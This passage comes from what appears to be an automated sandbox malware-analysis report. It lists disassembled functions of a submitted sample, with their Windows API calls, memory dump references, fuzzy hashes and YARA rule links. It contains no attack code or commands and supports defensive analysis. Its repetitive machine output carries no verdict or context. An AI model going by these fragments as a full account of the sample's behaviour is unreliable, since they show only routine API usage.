                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7842
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7868
                                              • SysAllocString.OLEAUT32(00000000), ref: 00DD786B
                                              • SysAllocString.OLEAUT32 ref: 00DD788C
                                              • SysFreeString.OLEAUT32 ref: 00DD7895
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD78AF
                                              • SysAllocString.OLEAUT32(?), ref: 00DD78BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 4cc9b416ecf28a3e9e1b3d0b7ff9a2fcc1adf95ae7ad7acda300cbfb6f511c47
                                              • Instruction ID: 5c4df460d169f237fa76aeb6202c9fd372b4316584ca71b6883ec5803cbc8016
                                              • Opcode Fuzzy Hash: 4cc9b416ecf28a3e9e1b3d0b7ff9a2fcc1adf95ae7ad7acda300cbfb6f511c47
                                              • Instruction Fuzzy Hash: 1321B331608205AFDB10AFB9DC8DDAA77ECFB083607148166F915DB2A1E670DC85DB74
                                              Function 00DE04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00DE04F2
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE052E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: daef73a0e5f65cbc64598414620f85f381457c39b56cde13bf1cab66b582f124
                                              • Instruction ID: 072b83b3ddac6e609c43915de2d8ba03248a0c7fb8828c2c90c0df9cedfe94df
                                              • Opcode Fuzzy Hash: daef73a0e5f65cbc64598414620f85f381457c39b56cde13bf1cab66b582f124
                                              • Instruction Fuzzy Hash: 4E218B71500346AFDB20AF2ADC04A9A7BB4AF45724F244A19F8E5E62E0D7B0D984CF30
                                              Function 00DE05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00DE05C6
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DE0601
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 7f6182761f9e1f761486a0dee1368ef73c60e00bb9e79942147a238fff324f7b
                                              • Instruction ID: a53aa399b5d23c43fb0666f1c4b1a9ecebb2a6ff2d06dda4a7171f46ac30c52c
                                              • Opcode Fuzzy Hash: 7f6182761f9e1f761486a0dee1368ef73c60e00bb9e79942147a238fff324f7b
                                              • Instruction Fuzzy Hash: 692171755003459FDB20AF6A9C04B5A7BA4AF95720F240B1DE8A1E72E0D7B198E0CB30
                                              Function 00E040AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D7600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                                • Part of subcall function 00D7600E: GetStockObject.GDI32(00000011), ref: 00D76060
                                                • Part of subcall function 00D7600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E04112
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E0411F
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E0412A
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E04139
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E04145
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 904b575ce5e62fc8c773aa7cf8355d178d2a2ed1090fa5247f73a6449c2179a6
                                              • Instruction ID: 11fc14566f48002d0fc0539d2b14f1a99fe2b90d776a01aa2e143e22c854d82b
                                              • Opcode Fuzzy Hash: 904b575ce5e62fc8c773aa7cf8355d178d2a2ed1090fa5247f73a6449c2179a6
                                              • Instruction Fuzzy Hash: D81190B214021DBEEF218F65CC85EE77FADEF08798F005110BB58B2090CA729C61DBA4
                                              Function 00DAD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DAD7A3: _free.LIBCMT ref: 00DAD7CC
                                              • _free.LIBCMT ref: 00DAD82D
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DAD838
                                              • _free.LIBCMT ref: 00DAD843
                                              • _free.LIBCMT ref: 00DAD897
                                              • _free.LIBCMT ref: 00DAD8A2
                                              • _free.LIBCMT ref: 00DAD8AD
                                              • _free.LIBCMT ref: 00DAD8B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                              • Instruction ID: 13ce301860316431b6f6fd2844b88eb3675d6a87dc2d7551de2928f3ad9e8ff0
                                              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                              • Instruction Fuzzy Hash: 68115E71580B04AAD621BFB1CC47FDB7BDDEF02B00F400C25B29BA68A2DB75B5058A71
                                              Function 00DDDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DDDA74
                                              • LoadStringW.USER32(00000000), ref: 00DDDA7B
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DDDA91
                                              • LoadStringW.USER32(00000000), ref: 00DDDA98
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DDDADC
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00DDDAB9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 4072794657-3128320259
                                              • Opcode ID: c7943b6784f77c082118c22a62b304742eeadcec8b23e7a10f1a42d3dbd2f190
                                              • Instruction ID: 71d895031068f903d595d52ccbe9e0e405070f5aab6a60973bc8370a7fc49197
                                              • Opcode Fuzzy Hash: c7943b6784f77c082118c22a62b304742eeadcec8b23e7a10f1a42d3dbd2f190
                                              • Instruction Fuzzy Hash: A80162F69002087FEB109BE49D89EE7766CE708701F544592B746F2081E6759EC88F74
                                              Function 00DE096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(00FBCAD8,00FBCAD8), ref: 00DE097B
                                              • RtlEnterCriticalSection.NTDLL(00FBCAB8), ref: 00DE098D
                                              • TerminateThread.KERNEL32(00FBA5C0,000001F6), ref: 00DE099B
                                              • WaitForSingleObject.KERNEL32(00FBA5C0,000003E8), ref: 00DE09A9
                                              • CloseHandle.KERNEL32(00FBA5C0), ref: 00DE09B8
                                              • InterlockedExchange.KERNEL32(00FBCAD8,000001F6), ref: 00DE09C8
                                              • RtlLeaveCriticalSection.NTDLL(00FBCAB8), ref: 00DE09CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: de351f3a7ff8477da43809580db704f814460388e806935ac4dfc00edc5c0650
                                              • Instruction ID: b3eb706199c93ddc0a8a2d4dd17bee8c3ea4c99d239ddd81260ad50d609a5cb0
                                              • Opcode Fuzzy Hash: de351f3a7ff8477da43809580db704f814460388e806935ac4dfc00edc5c0650
                                              • Instruction Fuzzy Hash: D2F0CD31442912AFD7516F95EE89AD67A35BF05702F541215F10160CB1C77694E9CFA0
                                              Function 00DA01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                              Download Yara Rule
                                              APIs
                                              • __allrem.LIBCMT ref: 00DA00BA
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA00D6
                                              • __allrem.LIBCMT ref: 00DA00ED
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA010B
                                              • __allrem.LIBCMT ref: 00DA0122
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA0140
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                              • Instruction ID: ac6263d317d888dacc10d57f9d52b2beb2995abadbf03f4b3b3552418955af1d
                                              • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                              • Instruction Fuzzy Hash: D981F672A00B069BEB209F68CC41BAB77E9EF46334F28453AF551D7281E770D9058BB4
                                              Function 00DA61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D982D9,00D982D9,?,?,?,00DA644F,00000001,00000001,8BE85006), ref: 00DA6258
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DA644F,00000001,00000001,8BE85006,?,?,?), ref: 00DA62DE
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DA63D8
                                              • __freea.LIBCMT ref: 00DA63E5
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              • __freea.LIBCMT ref: 00DA63EE
                                              • __freea.LIBCMT ref: 00DA6413
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 4ee4e1a26317ce3aa8f43a10b5215028badd9d1cfb0e565f05a0b9c40256b3c3
                                              • Instruction ID: 779bdfb478266bb6f985b2d2693505f336785502977ad7981ad9205f325869bd
                                              • Opcode Fuzzy Hash: 4ee4e1a26317ce3aa8f43a10b5215028badd9d1cfb0e565f05a0b9c40256b3c3
                                              • Instruction Fuzzy Hash: E951AE72A00216EFDF259F64CC81EAF7AAAEF46750F1D4629F805D6180EB34DC45C6B0
                                              Function 00DFBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFBCCA
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBD25
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFBD6A
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DFBD99
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DFBDF3
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFBDFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                              • String ID:
                                              • API String ID: 1120388591-0
                                              • Opcode ID: f560ad287dd6d99689fe7b7834eaeeb9a10169b5e557e4bf79bc3e485f966101
                                              • Instruction ID: 8dccc435ba079524d7a55774acbc51c962b7b35efa9b806534c58278ef0dc84b
                                              • Opcode Fuzzy Hash: f560ad287dd6d99689fe7b7834eaeeb9a10169b5e557e4bf79bc3e485f966101
                                              • Instruction Fuzzy Hash: 4F81B030108245EFD714DF24C891E2ABBE5FF84318F19855DF59A4B2A2DB32ED45CBA2
                                              Function 00DCF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(00000035), ref: 00DCF7B9
                                              • SysAllocString.OLEAUT32(00000001), ref: 00DCF860
                                              • VariantCopy.OLEAUT32(00DCFA64,00000000), ref: 00DCF889
                                              • VariantClear.OLEAUT32(00DCFA64), ref: 00DCF8AD
                                              • VariantCopy.OLEAUT32(00DCFA64,00000000), ref: 00DCF8B1
                                              • VariantClear.OLEAUT32(?), ref: 00DCF8BB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCopy$AllocInitString
                                              • String ID:
                                              • API String ID: 3859894641-0
                                              • Opcode ID: 76df03264dad599e4ea50156f664b9773bf59c42ac17d49c6c4dce7d7e5d48ca
                                              • Instruction ID: 746479a0237a8239928421fa75a133d29ae9b97f9fb50b671fc6bc4f9a7c5d8b
                                              • Opcode Fuzzy Hash: 76df03264dad599e4ea50156f664b9773bf59c42ac17d49c6c4dce7d7e5d48ca
                                              • Instruction Fuzzy Hash: A651B536600312ABCF14AB65D895FADB3A6EF45710B24946BE905DF291EB708C40CB77
                                              Function 00D8920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • BeginPaint.USER32(?,?,?), ref: 00D89241
                                              • GetWindowRect.USER32(?,?), ref: 00D892A5
                                              • ScreenToClient.USER32(?,?), ref: 00D892C2
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D892D3
                                              • EndPaint.USER32(?,?,?,?,?), ref: 00D89321
                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DC71EA
                                                • Part of subcall function 00D89339: BeginPath.GDI32(00000000), ref: 00D89357
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                              • String ID:
                                              • API String ID: 3050599898-0
                                              • Opcode ID: adbe86395c86f322798b89b2cd4db9a76c588cf057678db3b0b3080f9f3d6d44
                                              • Instruction ID: 22d01d9f8551664848b1305a69dc46cd4a44b124e52b38462c33e141ed6c79d8
                                              • Opcode Fuzzy Hash: adbe86395c86f322798b89b2cd4db9a76c588cf057678db3b0b3080f9f3d6d44
                                              • Instruction Fuzzy Hash: E041B330104301AFDB11EF65DC94FBABBB8EB86720F180269FA94971E1C7719889DB71
                                              Function 00DE07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DE080C
                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DE0847
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00DE0863
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00DE08DC
                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DE08F3
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE0921
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
